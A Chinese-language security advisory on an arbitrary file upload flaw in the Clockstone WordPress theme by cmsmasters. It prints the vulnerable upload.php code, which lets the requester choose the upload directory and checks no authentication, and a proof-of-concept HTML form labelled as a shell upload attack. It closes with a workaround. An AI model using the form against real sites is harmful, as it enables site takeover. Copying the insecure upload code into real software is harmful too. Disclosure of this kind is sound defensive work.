漏洞主題版本:cmsmasters Clockstone
Clockstone是Wordpress的終極主題,一個單一的主題內集合了眾多功能。
WordPress的Clockstone主題和其他主題存在文件上傳漏洞。存在該漏洞的原因是由於問題代碼對已登錄的用戶沒有進行身份驗證操作。攻擊者可通過上傳任意文件到受害者站點,進而獲取站點的訪問權限。
主題內有漏洞的代碼:
##############################################################
# <?php
#
# if ($_POST['url']){ $uploaddir = $_POST['url']; }
#
# $first_filename = $_FILES['uploadfile']['name'];
#
# $filename = md5($first_filename);
#
# $ext = substr($first_filename, 1 + strrpos($first_filename, ‘.’));
#
# $file = $uploaddir . basename($filename.’.’.$ext);
#
# if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)){
# echo basename($filename.’.’.$ext);
# } else {
# echo ‘error’;
# }
#
# ?>
測試:
##############################################################
# Shell upload attack:<br />
# <form enctype=”multipart/form-data” action=”http://www.examplesite.com/wp-content/themes/clockstone/theme/functions/upload.php” method=”post”>
# <input type=”text” name=”url” value=”./” /><br />
# Please choose a file: <input name=”uploadfile” type=”file” /><br />
# <input type=”submit” value=”Upload” />
# </form>
##############################################################
臨時解決方法:
如果您不能立刻安裝補丁或者升級,建議您採取以下措施以降低威脅:
* 禁用CMSMasters主題
廠商補丁:
cmsmasters
———-
目前廠商還沒有提供補丁或者升級程序,我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本:
http://themeforest.net/item/clockstone-ultimate-wordpress-theme/306607
